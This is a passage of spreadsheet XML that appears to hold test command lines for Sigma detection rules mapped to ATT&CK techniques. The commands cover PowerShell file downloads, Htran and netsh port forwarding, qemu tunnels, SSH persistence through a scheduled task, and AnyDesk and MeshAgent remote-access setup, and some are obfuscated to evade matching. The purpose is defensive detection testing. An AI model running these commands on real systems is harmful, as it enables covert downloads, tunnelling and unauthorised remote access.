      <c r="B523" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C523" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D523" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E523" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I523" s="43" t="n"/>
      <c r="J523" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K523" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="524" ht="15.75" customHeight="1" s="42">
      <c r="A524" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B524" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C524" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D524" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E524" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.txt', '$env:TEMP\test.txt')"</t>
        </is>
      </c>
      <c r="F524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I524" s="43" t="n"/>
      <c r="J524" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K524" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="525" ht="15.75" customHeight="1" s="42">
      <c r="A525" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B525" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C525" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D525" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E525" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.txt', 'C:\t'+'est.txt')"</t>
        </is>
      </c>
      <c r="F525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I525" s="43" t="n"/>
      <c r="J525" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K525" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="526" ht="15.75" customHeight="1" s="42">
      <c r="A526" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B526" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C526" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D526" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E526" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I526" s="43" t="n"/>
      <c r="J526" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K526" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="527" ht="15.75" customHeight="1" s="42">
      <c r="A527" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B527" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_htran_or_natbypass</t>
        </is>
      </c>
      <c r="C527" s="43" t="inlineStr">
        <is>
          <t>HackTool - Htran/NATBypass Execution</t>
        </is>
      </c>
      <c r="D527" s="43" t="inlineStr">
        <is>
          <t>f5e3b62f-e577-4e59-931e-0a15b2b94e1e</t>
        </is>
      </c>
      <c r="E527" s="43" t="inlineStr">
        <is>
          <t>htran.exe -tran -c 127.0.0.1 -p 8080</t>
        </is>
      </c>
      <c r="F527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I527" s="43" t="n"/>
      <c r="J527" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K527" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="528" ht="15.75" customHeight="1" s="42">
      <c r="A528" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B528" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C528" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D528" s="43" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E528" s="43" t="inlineStr">
        <is>
          <t>netsh -c interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=8080 connectaddress=10.0.0.5 connectport=80</t>
        </is>
      </c>
      <c r="F528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H528" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I528" s="43" t="n"/>
      <c r="J528" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K528" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="529" ht="15.75" customHeight="1" s="42">
      <c r="A529" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B529" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C529" s="43" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D529" s="43" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E529" s="43" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 listenport=3389 connectport=80 connectaddress=10.0.0.5</t>
        </is>
      </c>
      <c r="F529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H529" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I529" s="43" t="n"/>
      <c r="J529" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K529" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="530" ht="15.75" customHeight="1" s="42">
      <c r="A530" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B530" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_qemu_suspicious_execution</t>
        </is>
      </c>
      <c r="C530" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Usage Of Qemu</t>
        </is>
      </c>
      <c r="D530" s="43" t="inlineStr">
        <is>
          <t>5fc297ae-25b6-488a-8f25-cc12ac29b744</t>
        </is>
      </c>
      <c r="E530" s="43" t="inlineStr">
        <is>
          <t>qemu-system-x86_64.exe -m 1M -netdev user,id=n0,restrict=off,connect=192.168.1.100:443 -nographic</t>
        </is>
      </c>
      <c r="F530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H530" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I530" s="43" t="n"/>
      <c r="J530" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K530" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="531" ht="15.75" customHeight="1" s="42">
      <c r="A531" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B531" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_qemu_suspicious_execution</t>
        </is>
      </c>
      <c r="C531" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Usage Of Qemu</t>
        </is>
      </c>
      <c r="D531" s="43" t="inlineStr">
        <is>
          <t>5fc297ae-25b6-488a-8f25-cc12ac29b744</t>
        </is>
      </c>
      <c r="E531" s="43" t="inlineStr">
        <is>
          <t>qemu-system-x86_64.exe -m 4M -netdev user,id=net0,restrict=n,connect=127.0.0.1:4444 -display none</t>
        </is>
      </c>
      <c r="F531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H531" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I531" s="43" t="n"/>
      <c r="J531" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K531" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="532" ht="15.75" customHeight="1" s="42">
      <c r="A532" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B532" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_qemu_suspicious_execution</t>
        </is>
      </c>
      <c r="C532" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Usage Of Qemu</t>
        </is>
      </c>
      <c r="D532" s="43" t="inlineStr">
        <is>
          <t>5fc297ae-25b6-488a-8f25-cc12ac29b744</t>
        </is>
      </c>
      <c r="E532" s="43" t="inlineStr">
        <is>
          <t>qemu-system-x86_64.exe -m 512K -netdev "user,id=vlan0,restrict=o""ff,connect=10.0.0.5:8080" -nographic</t>
        </is>
      </c>
      <c r="F532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I532" s="43" t="n"/>
      <c r="J532" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K532" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="533" ht="15.75" customHeight="1" s="42">
      <c r="A533" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B533" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C533" s="43" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D533" s="43" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E533" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /CREATE /SC ONLOGON /TN "SSHD" /TR "sshd.exe -D" /F</t>
        </is>
      </c>
      <c r="F533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I533" s="43" t="n"/>
      <c r="J533" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K533" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="534" ht="15.75" customHeight="1" s="42">
      <c r="A534" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B534" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_run_local_rdp_file</t>
        </is>
      </c>
      <c r="C534" s="43" t="inlineStr">
        <is>
          <t>Mstsc.EXE Execution With Local RDP File</t>
        </is>
      </c>
      <c r="D534" s="43" t="inlineStr">
        <is>
          <t>5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af</t>
        </is>
      </c>
      <c r="E534" s="43" t="inlineStr">
        <is>
          <t>mstsc.exe C:\Temp\hidden.rdp</t>
        </is>
      </c>
      <c r="F534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I534" s="43" t="n"/>
      <c r="J534" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K534" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="535" ht="15.75" customHeight="1" s="42">
      <c r="A535" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B535" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_run_local_rdp_file</t>
        </is>
      </c>
      <c r="C535" s="43" t="inlineStr">
        <is>
          <t>Mstsc.EXE Execution With Local RDP File</t>
        </is>
      </c>
      <c r="D535" s="43" t="inlineStr">
        <is>
          <t>5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af</t>
        </is>
      </c>
      <c r="E535" s="43" t="inlineStr">
        <is>
          <t>mstsc.exe C:\Users\Public\malicious.rdp -f</t>
        </is>
      </c>
      <c r="F535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I535" s="43" t="n"/>
      <c r="J535" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K535" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="536" ht="15.75" customHeight="1" s="42">
      <c r="A536" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B536" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_run_local_rdp_file</t>
        </is>
      </c>
      <c r="C536" s="43" t="inlineStr">
        <is>
          <t>Mstsc.EXE Execution With Local RDP File</t>
        </is>
      </c>
      <c r="D536" s="43" t="inlineStr">
        <is>
          <t>5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af</t>
        </is>
      </c>
      <c r="E536" s="43" t="inlineStr">
        <is>
          <t>mstsc.exe "C:\Temp\hidden.rdp"</t>
        </is>
      </c>
      <c r="F536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H536" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I536" s="43" t="n"/>
      <c r="J536" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K536" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="537" ht="15.75" customHeight="1" s="42">
      <c r="A537" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B537" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mstsc_run_local_rdp_file_susp_location</t>
        </is>
      </c>
      <c r="C537" s="43" t="inlineStr">
        <is>
          <t>Suspicious Mstsc.EXE Execution With Local RDP File</t>
        </is>
      </c>
      <c r="D537" s="43" t="inlineStr">
        <is>
          <t>6e22722b-dfb1-4508-a911-49ac840b40f8</t>
        </is>
      </c>
      <c r="E537" s="43" t="inlineStr">
        <is>
          <t>mstsc.exe "C:\Users\Public\connection.rdp"</t>
        </is>
      </c>
      <c r="F537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H537" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I537" s="43" t="n"/>
      <c r="J537" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K537" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="538" ht="15.75" customHeight="1" s="42">
      <c r="A538" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B538" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli</t>
        </is>
      </c>
      <c r="C538" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - AnyDesk Piped Password Via CLI</t>
        </is>
      </c>
      <c r="D538" s="43" t="inlineStr">
        <is>
          <t>b1377339-fda6-477a-b455-ac0923f9ec2c</t>
        </is>
      </c>
      <c r="E538" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password"</t>
        </is>
      </c>
      <c r="F538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H538" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I538" s="43" t="n"/>
      <c r="J538" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K538" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="539" ht="15.75" customHeight="1" s="42">
      <c r="A539" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B539" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli</t>
        </is>
      </c>
      <c r="C539" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - AnyDesk Piped Password Via CLI</t>
        </is>
      </c>
      <c r="D539" s="43" t="inlineStr">
        <is>
          <t>b1377339-fda6-477a-b455-ac0923f9ec2c</t>
        </is>
      </c>
      <c r="E539" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C echo J9kzQ2Y0qO | "C:\ProgramData\anydesk.exe" --set-password</t>
        </is>
      </c>
      <c r="F539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I539" s="43" t="n"/>
      <c r="J539" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K539" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="540" ht="15.75" customHeight="1" s="42">
      <c r="A540" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B540" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli</t>
        </is>
      </c>
      <c r="C540" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - AnyDesk Piped Password Via CLI</t>
        </is>
      </c>
      <c r="D540" s="43" t="inlineStr">
        <is>
          <t>b1377339-fda6-477a-b455-ac0923f9ec2c</t>
        </is>
      </c>
      <c r="E540" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c echo J9kzQ2Y0qO^|C:\ProgramData\anydesk.exe --set-password</t>
        </is>
      </c>
      <c r="F540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H540" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I540" s="43" t="n"/>
      <c r="J540" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K540" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="541" ht="15.75" customHeight="1" s="42">
      <c r="A541" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B541" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli</t>
        </is>
      </c>
      <c r="C541" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - AnyDesk Piped Password Via CLI</t>
        </is>
      </c>
      <c r="D541" s="43" t="inlineStr">
        <is>
          <t>b1377339-fda6-477a-b455-ac0923f9ec2c</t>
        </is>
      </c>
      <c r="E541" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password</t>
        </is>
      </c>
      <c r="F541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H541" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I541" s="43" t="n"/>
      <c r="J541" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K541" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="542" ht="15.75" customHeight="1" s="42">
      <c r="A542" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B542" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C542" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D542" s="43" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E542" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName</t>
        </is>
      </c>
      <c r="F542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H542" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I542" s="43" t="n"/>
      <c r="J542" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K542" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="543" ht="15.75" customHeight="1" s="42">
      <c r="A543" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B543" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C543" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D543" s="43" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E543" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName MyService</t>
        </is>
      </c>
      <c r="F543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I543" s="43" t="n"/>
      <c r="J543" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K543" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="544" ht="15.75" customHeight="1" s="42">
      <c r="A544" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B544" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C544" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D544" s="43" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E544" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName=MyService</t>
        </is>
      </c>
      <c r="F544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I544" s="43" t="n"/>
      <c r="J544" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K544" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="545" ht="15.75" customHeight="1" s="42">
      <c r="A545" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B545" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C545" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D545" s="43" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E545" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName MyService --otherArg</t>
        </is>
      </c>
      <c r="F545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I545" s="43" t="n"/>
      <c r="J545" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K545" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="546" ht="15.75" customHeight="1" s="42">
      <c r="A546" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B546" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C546" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D546" s="43" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E546" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName MyService --meshServiceName AnotherService --meshServiceName FinalService</t>
        </is>
      </c>
      <c r="F546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I546" s="43" t="n"/>
      <c r="J546" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K546" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="547" ht="15.75" customHeight="1" s="42">
      <c r="A547" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B547" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C547" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D547" s="43" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E547" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName MyService --meshServiceName AnotherService --meshServiceName FinalService --otherArg</t>
        </is>
      </c>
      <c r="F547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I547" s="43" t="n"/>
      <c r="J547" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K547" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="548" ht="15.75" customHeight="1" s="42">
      <c r="A548" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B548" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C548" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D548" s="43" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E548" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName MyService --meshServiceName AnotherService --meshServiceName FinalService --otherArg --yetAnotherArg</t>
        </is>
      </c>
      <c r="F548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I548" s="43" t="n"/>
      <c r="J548" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K548" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="549" ht="15.75" customHeight="1" s="42">
      <c r="A549" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B549" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C549" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D549" s="43" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E549" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName MyService --meshServiceName AnotherService --meshServiceName FinalService --otherArg --yetAnotherArg --moreArgs</t>
        </is>
      </c>
      <c r="F549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I549" s="43" t="n"/>
      <c r="J549" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K549" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="550" ht="15.75" customHeight="1" s="42">
      <c r="A550" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B550" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C550" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D550" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E550" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName -arg1 -arg2</t>
        </is>
      </c>
      <c r="F550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H550" s="43" t="b">
        <v>0</v>
      </c>
